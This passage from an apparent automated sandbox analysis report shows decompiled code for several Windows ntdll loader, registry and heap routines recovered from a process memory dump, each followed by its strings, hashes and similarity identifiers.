                            • Instruction Fuzzy Hash: 2DF13976D00618EFCF15DFE9D984AEEBBB9EF48650F1401AAE505EB250D7749E00CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 44%
                            			E037F8E00(void* __ecx) {
                            				signed int _v8;
                            				char _v12;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr* _t32;
                            				intOrPtr _t35;
                            				intOrPtr _t43;
                            				void* _t46;
                            				intOrPtr _t47;
                            				void* _t48;
                            				signed int _t49;
                            				void* _t50;
                            				intOrPtr* _t51;
                            				signed int _t52;
                            				void* _t53;
                            				intOrPtr _t55;
                            
                            				_v8 =  *0x38bd360 ^ _t52;
                            				_t49 = 0;
                            				_t48 = __ecx;
                            				_t55 =  *0x38b8464; // 0x772a0110
                            				if(_t55 == 0) {
                            					L9:
                            					if( !_t49 >= 0) {
                            						if(( *0x38b5780 & 0x00000003) != 0) {
                            							E03845510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                            						}
                            						if(( *0x38b5780 & 0x00000010) != 0) {
                            							asm("int3");
                            						}
                            					}
                            					return E0380B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                            				}
                            				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                            				_t43 =  *0x38b7984; // 0x31d3ea0
                            				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                            					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                            					if(_t48 == _t43) {
                            						_t50 = 0x5c;
                            						if( *_t32 == _t50) {
                            							_t46 = 0x3f;
                            							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                            								_t32 = _t32 + 8;
                            							}
                            						}
                            					}
                            					_t51 =  *0x38b8464; // 0x772a0110
                            					 *0x38bb1e0(_t47, _t32,  &_v12);
                            					_t49 =  *_t51();
                            					if(_t49 >= 0) {
                            						L8:
                            						_t35 = _v12;
                            						if(_t35 != 0) {
                            							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                            								E037F9B10( *((intOrPtr*)(_t48 + 0x48)));
                            								_t35 = _v12;
                            							}
                            							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                            						}
                            						goto L9;
                            					}
                            					if(_t49 != 0xc000008a) {
                            						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                            							if(_t49 != 0xc00000bb) {
                            								goto L8;
                            							}
                            						}
                            					}
                            					if(( *0x38b5780 & 0x00000005) != 0) {
                            						_push(_t49);
                            						E03845510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                            						_t53 = _t53 + 0x1c;
                            					}
                            					_t49 = 0;
                            					goto L8;
                            				} else {
                            					goto L9;
                            				}
                            			}


                            Strings
                            • Querying the active activation context failed with status 0x%08lx, xrefs: 03839357
                            • minkernel\ntdll\ldrsnap.c, xrefs: 0383933B, 03839367
                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0383932A
                            • LdrpFindDllActivationContext, xrefs: 03839331, 0383935D
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                            • API String ID: 0-3779518884
                            • Opcode ID: c88cbdae036579338931738a30708aafb394131eff539d80ce92b401c11d470c
                            • Instruction ID: f3ec1ad0b3891ad185afd61af91c33b20ada9d109cb86d8e9f5f0a21f992f25b
                            • Opcode Fuzzy Hash: c88cbdae036579338931738a30708aafb394131eff539d80ce92b401c11d470c
                            • Instruction Fuzzy Hash: 04411662A00715BFDB25EB588C48B79B7A8BB4125CF0E41E9EA1497351E7709D80C283
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E037D8794(void* __ecx) {
                            				signed int _v0;
                            				char _v8;
                            				signed int _v12;
                            				void* _v16;
                            				signed int _v20;
                            				intOrPtr _v24;
                            				signed int _v28;
                            				signed int _v32;
                            				signed int _v40;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				intOrPtr* _t77;
                            				signed int _t80;
                            				signed char _t81;
                            				signed int _t87;
                            				signed int _t91;
                            				void* _t92;
                            				void* _t94;
                            				signed int _t95;
                            				signed int _t103;
                            				signed int _t105;
                            				signed int _t110;
                            				signed int _t118;
                            				intOrPtr* _t121;
                            				intOrPtr _t122;
                            				signed int _t125;
                            				signed int _t129;
                            				signed int _t131;
                            				signed int _t134;
                            				signed int _t136;
                            				signed int _t143;
                            				signed int* _t147;
                            				signed int _t151;
                            				void* _t153;
                            				signed int* _t157;
                            				signed int _t159;
                            				signed int _t161;
                            				signed int _t166;
                            				signed int _t168;
                            
                            				_push(__ecx);
                            				_t153 = __ecx;
                            				_t159 = 0;
                            				_t121 = __ecx + 0x3c;
                            				if( *_t121 == 0) {
                            					L2:
                            					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                            					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                            						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                            						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                            						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                            							L6:
                            							if(E037D934A() != 0) {
                            								_t159 = E0384A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                            								__eflags = _t159;
                            								if(_t159 < 0) {
                            									_t81 =  *0x38b5780; // 0x0
                            									__eflags = _t81 & 0x00000003;
                            									if((_t81 & 0x00000003) != 0) {
                            										_push(_t159);
                            										E03845510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                            										_t81 =  *0x38b5780; // 0x0
                            									}
                            									__eflags = _t81 & 0x00000010;
                            									if((_t81 & 0x00000010) != 0) {
                            										asm("int3");
                            									}
                            								}
                            							}
                            						} else {
                            							_t159 = E037D849B(0, _t122, _t153, _t159, _t180);
                            							if(_t159 >= 0) {
                            								goto L6;
                            							}
                            						}
                            						_t80 = _t159;
                            						goto L8;
                            					} else {
                            						_t125 = 0x13;
                            						asm("int 0x29");
                            						_push(0);
                            						_push(_t159);
                            						_t161 = _t125;
                            						_t87 =  *( *[fs:0x30] + 0x1e8);
                            						_t143 = 0;
                            						_v40 = _t161;
                            						_t118 = 0;
                            						_push(_t153);
                            						__eflags = _t87;
                            						if(_t87 != 0) {
                            							_t118 = _t87 + 0x5d8;
                            							__eflags = _t118;
                            							if(_t118 == 0) {
                            								L46:
                            								_t118 = 0;
                            							} else {
                            								__eflags =  *(_t118 + 0x30);
                            								if( *(_t118 + 0x30) == 0) {
                            									goto L46;
                            								}
                            							}
                            						}
                            						_v32 = 0;
                            						_v28 = 0;
                            						_v16 = 0;
                            						_v20 = 0;
                            						_v12 = 0;
                            						__eflags = _t118;
                            						if(_t118 != 0) {
                            							__eflags = _t161;
                            							if(_t161 != 0) {
                            								__eflags =  *(_t118 + 8);
                            								if( *(_t118 + 8) == 0) {
                            									L22:
                            									_t143 = 1;
                            									__eflags = 1;
                            								} else {
                            									_t19 = _t118 + 0x40; // 0x40
                            									_t156 = _t19;
                            									E037D8999(_t19,  &_v16);
                            									__eflags = _v0;
                            									if(_v0 != 0) {
                            										__eflags = _v0 - 1;
                            										if(_v0 != 1) {
                            											goto L22;
                            										} else {
                            											_t128 =  *(_t161 + 0x64);
                            											__eflags =  *(_t161 + 0x64);
                            											if( *(_t161 + 0x64) == 0) {
                            												goto L22;
                            											} else {
                            												E037D8999(_t128,  &_v12);
                            												_t147 = _v12;
                            												_t91 = 0;
                            												__eflags = 0;
                            												_t129 =  *_t147;
                            												while(1) {
                            													__eflags =  *((intOrPtr*)(0x38b5c60 + _t91 * 8)) - _t129;
                            													if( *((intOrPtr*)(0x38b5c60 + _t91 * 8)) == _t129) {
                            														break;
                            													}
                            													_t91 = _t91 + 1;
                            													__eflags = _t91 - 5;
                            													if(_t91 < 5) {
                            														continue;
                            													} else {
                            														_t131 = 0;
                            														__eflags = 0;
                            													}
                            													L37:
                            													__eflags = _t131;
                            													if(_t131 != 0) {
                            														goto L22;
                            													} else {
                            														__eflags = _v16 - _t147;
                            														if(_v16 != _t147) {
                            															goto L22;
                            														} else {
                            															E037E2280(_t92, 0x38b86cc);
                            															_t94 = E03899DFB( &_v20);
                            															__eflags = _t94 - 1;
                            															if(_t94 != 1) {
                            															}
                            															asm("movsd");
                            															asm("movsd");
                            															asm("movsd");
                            															asm("movsd");
                            															 *_t118 =  *_t118 + 1;
                            															asm("adc dword [ebx+0x4], 0x0");
                            															_t95 = E037F61A0( &_v32);
                            															__eflags = _t95;
                            															if(_t95 != 0) {
                            																__eflags = _v32 | _v28;
                            																if((_v32 | _v28) != 0) {
                            																	_t71 = _t118 + 0x40; // 0x3f
                            																	_t134 = _t71;
                            																	goto L55;
                            																}
                            															}
                            															goto L30;
                            														}
                            													}
                            													goto L56;
                            												}
                            												_t92 = 0x38b5c64 + _t91 * 8;
                            												asm("lock xadd [eax], ecx");
                            												_t131 = (_t129 | 0xffffffff) - 1;
                            												goto L37;
                            											}
                            										}
                            										goto L56;
                            									} else {
                            										_t143 = E037D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                            										__eflags = _t143;
                            										if(_t143 != 0) {
                            											_t157 = _v12;
                            											_t103 = 0;
                            											__eflags = 0;
                            											_t136 =  &(_t157[1]);
                            											 *(_t161 + 0x64) = _t136;
                            											_t151 =  *_t157;
                            											_v20 = _t136;
                            											while(1) {
                            												__eflags =  *((intOrPtr*)(0x38b5c60 + _t103 * 8)) - _t151;
                            												if( *((intOrPtr*)(0x38b5c60 + _t103 * 8)) == _t151) {
                            													break;
                            												}
                            												_t103 = _t103 + 1;
                            												__eflags = _t103 - 5;
                            												if(_t103 < 5) {
                            													continue;
                            												}
                            												L21:
                            												_t105 = E0380F380(_t136, 0x37a1184, 0x10);
                            												__eflags = _t105;
                            												if(_t105 != 0) {
                            													__eflags =  *_t157 -  *_v16;
                            													if( *_t157 >=  *_v16) {
                            														goto L22;
                            													} else {
                            														asm("cdq");
                            														_t166 = _t157[5] & 0x0000ffff;
                            														_t108 = _t157[5] & 0x0000ffff;
                            														asm("cdq");
                            														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                            														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                            														if(__eflags > 0) {
                            															L29:
                            															E037E2280(_t108, 0x38b86cc);
                            															 *_t118 =  *_t118 + 1;
                            															_t42 = _t118 + 0x40; // 0x3f
                            															_t156 = _t42;
                            															asm("adc dword [ebx+0x4], 0x0");
                            															asm("movsd");
                            															asm("movsd");
                            															asm("movsd");
                            															asm("movsd");
                            															_t110 = E037F61A0( &_v32);
                            															__eflags = _t110;
                            															if(_t110 != 0) {
                            																__eflags = _v32 | _v28;
                            																if((_v32 | _v28) != 0) {
                            																	_t134 = _v20;
                            																	L55:
                            																	E03899D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                            																}
                            															}
                            															L30:
                            															 *_t118 =  *_t118 + 1;
                            															asm("adc dword [ebx+0x4], 0x0");
                            															E037DFFB0(_t118, _t156, 0x38b86cc);
                            															goto L22;
                            														} else {
                            															if(__eflags < 0) {
                            																goto L22;
                            															} else {
                            																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                            																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                            																	goto L22;
                            																} else {
                            																	goto L29;
                            																}
                            															}
                            														}
                            													}
                            													goto L56;
                            												}
                            												goto L22;
                            											}
                            											asm("lock inc dword [eax]");
                            											goto L21;
                            										}
                            									}
                            								}
                            							}
                            						}
                            						return _t143;
                            					}
                            				} else {
                            					_push( &_v8);
                            					_push( *((intOrPtr*)(__ecx + 0x50)));
                            					_push(__ecx + 0x40);
                            					_push(_t121);
                            					_push(0xffffffff);
                            					_t80 = E03809A00();
                            					_t159 = _t80;
                            					if(_t159 < 0) {
                            						L8:
                            						return _t80;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            				L56:
                            			}

                            Strings
                            • minkernel\ntdll\ldrsnap.c, xrefs: 03829C28
                            • LdrpDoPostSnapWork, xrefs: 03829C1E
                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03829C18
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                            • API String ID: 0-1948996284
                            • Opcode ID: 7926bb105f830d0c0f53887e754e365b9a57b3b6bfbf4a771364de719cda5ab6
                            • Instruction ID: 31a72ff52e7ba6d659dba45bcbdf64de41a854d9067112eabda074544f9f9e67
                            • Opcode Fuzzy Hash: 7926bb105f830d0c0f53887e754e365b9a57b3b6bfbf4a771364de719cda5ab6
                            • Instruction Fuzzy Hash: F0910671A1031AEFDF18DF98C480ABAB7B9FF45310F0941A9E845AB241E730ED41DB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 98%
                            			E037D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                            				char _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				char _v24;
                            				signed int _t73;
                            				void* _t77;
                            				char* _t82;
                            				char* _t87;
                            				signed char* _t97;
                            				signed char _t102;
                            				intOrPtr _t107;
                            				signed char* _t108;
                            				intOrPtr _t112;
                            				intOrPtr _t124;
                            				intOrPtr _t125;
                            				intOrPtr _t126;
                            
                            				_t107 = __edx;
                            				_v12 = __ecx;
                            				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                            				_t124 = 0;
                            				_v20 = __edx;
                            				if(E037DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                            					_t112 = _v8;
                            				} else {
                            					_t112 = 0;
                            					_v8 = 0;
                            				}
                            				if(_t112 != 0) {
                            					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                            						_t124 = 0xc000007b;
                            						goto L8;
                            					}
                            					_t73 =  *(_t125 + 0x34) | 0x00400000;
                            					 *(_t125 + 0x34) = _t73;
                            					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                            						goto L3;
                            					}
                            					 *(_t125 + 0x34) = _t73 | 0x01000000;
                            					_t124 = E037CC9A4( *((intOrPtr*)(_t125 + 0x18)));
                            					if(_t124 < 0) {
                            						goto L8;
                            					} else {
                            						goto L3;
                            					}
                            				} else {
                            					L3:
                            					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                            						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                            						L8:
                            						return _t124;
                            					}
                            					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                            						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                            							goto L5;
                            						}
                            						_t102 =  *0x38b5780; // 0x0
                            						if((_t102 & 0x00000003) != 0) {
                            							E03845510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                            							_t102 =  *0x38b5780; // 0x0
                            						}
                            						if((_t102 & 0x00000010) != 0) {
                            							asm("int3");
                            						}
                            						_t124 = 0xc0000428;
                            						goto L8;
                            					}
                            					L5:
                            					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                            						goto L8;
                            					}
                            					_t77 = _a4 - 0x40000003;
                            					if(_t77 == 0 || _t77 == 0x33) {
                            						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                            						if(E037E7D50() != 0) {
                            							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            						} else {
                            							_t82 = 0x7ffe0384;
                            						}
                            						_t108 = 0x7ffe0385;
                            						if( *_t82 != 0) {
                            							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                            								if(E037E7D50() == 0) {
                            									_t97 = 0x7ffe0385;
                            								} else {
                            									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            								}
                            								if(( *_t97 & 0x00000020) != 0) {
                            									E03847016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                            								}
                            							}
                            						}
                            						if(_a4 != 0x40000003) {
                            							L14:
                            							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                            							if(E037E7D50() != 0) {
                            								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            							} else {
                            								_t87 = 0x7ffe0384;
                            							}
                            							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                            								if(E037E7D50() != 0) {
                            									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            								}
                            								if(( *_t108 & 0x00000020) != 0) {
                            									E03847016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                            								}
                            							}
                            							goto L8;
                            						} else {
                            							_v16 = _t125 + 0x24;
                            							_t124 = E037FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                            							if(_t124 < 0) {
                            								E037CB1E1(_t124, 0x1490, 0, _v16);
                            								goto L8;
                            							}
                            							goto L14;
                            						}
                            					} else {
                            						goto L8;
                            					}
                            				}
                            			}

                            Strings
                            • minkernel\ntdll\ldrmap.c, xrefs: 038298A2
                            • Could not validate the crypto signature for DLL %wZ, xrefs: 03829891
                            • LdrpCompleteMapModule, xrefs: 03829898
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                            • API String ID: 0-1676968949
                            • Opcode ID: f89a24b1fe1d95f1eafa1893496e85651c2c24a0f9d8863ba3e9b5dd69874239
                            • Instruction ID: 4636a7936e5f574b6c5f5dfc5d5e4e607b4e9f9d4e9ccac51ddffef0342531a8
                            • Opcode Fuzzy Hash: f89a24b1fe1d95f1eafa1893496e85651c2c24a0f9d8863ba3e9b5dd69874239
                            • Instruction Fuzzy Hash: E151EF35A00785DBDB29CFA8C944B6ABBF4AB45314F0806A9E851DB7E1D730ED40CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E037CE620(void* __ecx, short* __edx, short* _a4) {
                            				char _v16;
                            				char _v20;
                            				intOrPtr _v24;
                            				char* _v28;
                            				char _v32;
                            				char _v36;
                            				char _v44;
                            				signed int _v48;
                            				intOrPtr _v52;
                            				void* _v56;
                            				void* _v60;
                            				char _v64;
                            				void* _v68;
                            				void* _v76;
                            				void* _v84;
                            				signed int _t59;
                            				signed int _t74;
                            				signed short* _t75;
                            				signed int _t76;
                            				signed short* _t78;
                            				signed int _t83;
                            				short* _t93;
                            				signed short* _t94;
                            				short* _t96;
                            				void* _t97;
                            				signed int _t99;
                            				void* _t101;
                            				void* _t102;
                            
                            				_t80 = __ecx;
                            				_t101 = (_t99 & 0xfffffff8) - 0x34;
                            				_t96 = __edx;
                            				_v44 = __edx;
                            				_t78 = 0;
                            				_v56 = 0;
                            				if(__ecx == 0 || __edx == 0) {
                            					L28:
                            					_t97 = 0xc000000d;
                            				} else {
                            					_t93 = _a4;
                            					if(_t93 == 0) {
                            						goto L28;
                            					}
                            					_t78 = E037CF358(__ecx, 0xac);
                            					if(_t78 == 0) {
                            						_t97 = 0xc0000017;
                            						L6:
                            						if(_v56 != 0) {
                            							_push(_v56);
                            							E038095D0();
                            						}
                            						if(_t78 != 0) {
                            							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                            						}
                            						return _t97;
                            					}
                            					E0380FA60(_t78, 0, 0x158);
                            					_v48 = _v48 & 0x00000000;
                            					_t102 = _t101 + 0xc;
                            					 *_t96 = 0;
                            					 *_t93 = 0;
                            					E0380BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                            					_v36 = 0x18;
                            					_v28 =  &_v44;
                            					_v64 = 0;
                            					_push( &_v36);
                            					_push(0x20019);
                            					_v32 = 0;
                            					_push( &_v64);
                            					_v24 = 0x40;
                            					_v20 = 0;
                            					_v16 = 0;
                            					_t97 = E03809600();
                            					if(_t97 < 0) {
                            						goto L6;
                            					}
                            					E0380BB40(0,  &_v36, L"InstallLanguageFallback");
                            					_push(0);
                            					_v48 = 4;
                            					_t97 = L037CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                            					if(_t97 >= 0) {
                            						if(_v52 != 1) {
                            							L17:
                            							_t97 = 0xc0000001;
                            							goto L6;
                            						}
                            						_t59 =  *_t78 & 0x0000ffff;
                            						_t94 = _t78;
                            						_t83 = _t59;
                            						if(_t59 == 0) {
                            							L19:
                            							if(_t83 == 0) {
                            								L23:
                            								E0380BB40(_t83, _t102 + 0x24, _t78);
                            								if(L037D43C0( &_v48,  &_v64) == 0) {
                            									goto L17;
                            								}
                            								_t84 = _v48;
                            								 *_v48 = _v56;
                            								if( *_t94 != 0) {
                            									E0380BB40(_t84, _t102 + 0x24, _t94);
                            									if(L037D43C0( &_v48,  &_v64) != 0) {
                            										 *_a4 = _v56;
                            									} else {
                            										_t97 = 0xc0000001;
                            										 *_v48 = 0;
                            									}
                            								}
                            								goto L6;
                            							}
                            							_t83 = _t83 & 0x0000ffff;
                            							while(_t83 == 0x20) {
                            								_t94 =  &(_t94[1]);
                            								_t74 =  *_t94 & 0x0000ffff;
                            								_t83 = _t74;
                            								if(_t74 != 0) {
                            									continue;
                            								}
                            								goto L23;
                            							}
                            							goto L23;
                            						} else {
                            							goto L14;
                            						}
                            						while(1) {
                            							L14:
                            							_t27 =  &(_t94[1]); // 0x2
                            							_t75 = _t27;
                            							if(_t83 == 0x2c) {
                            								break;
                            							}
                            							_t94 = _t75;
                            							_t76 =  *_t94 & 0x0000ffff;
                            							_t83 = _t76;
                            							if(_t76 != 0) {
                            								continue;
                            							}
                            							goto L23;
                            						}
                            						 *_t94 = 0;
                            						_t94 = _t75;
                            						_t83 =  *_t75 & 0x0000ffff;
                            						goto L19;
                            					}
                            				}
                            			}

                            Strings
                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 037CE68C
                            • @, xrefs: 037CE6C0
                            • InstallLanguageFallback, xrefs: 037CE6DB
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                            • API String ID: 0-1757540487
                            • Opcode ID: 6e9a8f68a2b42b613bc5080db7d0a4eb3bb1cd1974a80f3741ae9280d66e2ec5
                            • Instruction ID: 962ef37b186744de43e6bc9ebb9d9a22904dbccc426f3ae500ffaf1b53d81cbd
                            • Opcode Fuzzy Hash: 6e9a8f68a2b42b613bc5080db7d0a4eb3bb1cd1974a80f3741ae9280d66e2ec5
                            • Instruction Fuzzy Hash: 895114B65183559BC710DFA5C840A6BF7E8BF89715F0809AEF985E7240F730DA44C7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E0388E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                            				signed int _v20;
                            				char _v24;
                            				signed int _v40;
                            				char _v44;
                            				intOrPtr _v48;
                            				signed int _v52;
                            				unsigned int _v56;
                            				char _v60;
                            				signed int _v64;
                            				char _v68;
                            				signed int _v72;
                            				void* __ebx;
                            				void* __edi;
                            				char _t87;
                            				signed int _t90;
                            				signed int _t94;
                            				signed int _t100;
                            				intOrPtr* _t113;
                            				signed int _t122;
                            				void* _t132;
                            				void* _t135;
                            				signed int _t139;
                            				signed int* _t141;
                            				signed int _t146;
                            				signed int _t147;
                            				void* _t153;
                            				signed int _t155;
                            				signed int _t159;
                            				char _t166;
                            				void* _t172;
                            				void* _t176;
                            				signed int _t177;
                            				intOrPtr* _t179;
                            
                            				_t179 = __ecx;
                            				_v48 = __edx;
                            				_v68 = 0;
                            				_v72 = 0;
                            				_push(__ecx[1]);
                            				_push( *__ecx);
                            				_push(0);
                            				_t153 = 0x14;
                            				_t135 = _t153;
                            				_t132 = E0388BBBB(_t135, _t153);
                            				if(_t132 == 0) {
                            					_t166 = _v68;
                            					goto L43;
                            				} else {
                            					_t155 = 0;
                            					_v52 = 0;
                            					asm("stosd");
                            					asm("stosd");
                            					asm("stosd");
                            					asm("stosd");
                            					asm("stosd");
                            					_v56 = __ecx[1];
                            					if( *__ecx >> 8 < 2) {
                            						_t155 = 1;
                            						_v52 = 1;
                            					}
                            					_t139 = _a4;
                            					_t87 = (_t155 << 0xc) + _t139;
                            					_v60 = _t87;
                            					if(_t87 < _t139) {
                            						L11:
                            						_t166 = _v68;
                            						L12:
                            						if(_t132 != 0) {
                            							E0388BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                            						}
                            						L43:
                            						if(_v72 != 0) {
                            							_push( *((intOrPtr*)(_t179 + 4)));
                            							_push( *_t179);
                            							_push(0x8000);
                            							E0388AFDE( &_v72,  &_v60);
                            						}
                            						L46:
                            						return _t166;
                            					}
                            					_t90 =  *(_t179 + 0xc) & 0x40000000;
                            					asm("sbb edi, edi");
                            					_t172 = ( ~_t90 & 0x0000003c) + 4;
                            					if(_t90 != 0) {
                            						_push(0);
                            						_push(0x14);
                            						_push( &_v44);
                            						_push(3);
                            						_push(_t179);
                            						_push(0xffffffff);
                            						if(E03809730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                            							_push(_t139);
                            							E0388A80D(_t179, 1, _v40, 0);
                            							_t172 = 4;
                            						}
                            					}
                            					_t141 =  &_v72;
                            					if(E0388A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                            						_v64 = _a4;
                            						_t94 =  *(_t179 + 0xc) & 0x40000000;
                            						asm("sbb edi, edi");
                            						_t176 = ( ~_t94 & 0x0000003c) + 4;
                            						if(_t94 != 0) {
                            							_push(0);
                            							_push(0x14);
                            							_push( &_v24);
                            							_push(3);
                            							_push(_t179);
                            							_push(0xffffffff);
                            							if(E03809730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                            								_push(_t141);
                            								E0388A80D(_t179, 1, _v20, 0);
                            								_t176 = 4;
                            							}
                            						}
                            						if(E0388A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                            							goto L11;
                            						} else {
                            							_t177 = _v64;
                            							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                            							_t100 = _v52 + _v52;
                            							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                            							 *(_t132 + 0x10) = _t146;
                            							asm("bsf eax, [esp+0x18]");
                            							_v52 = _t100;
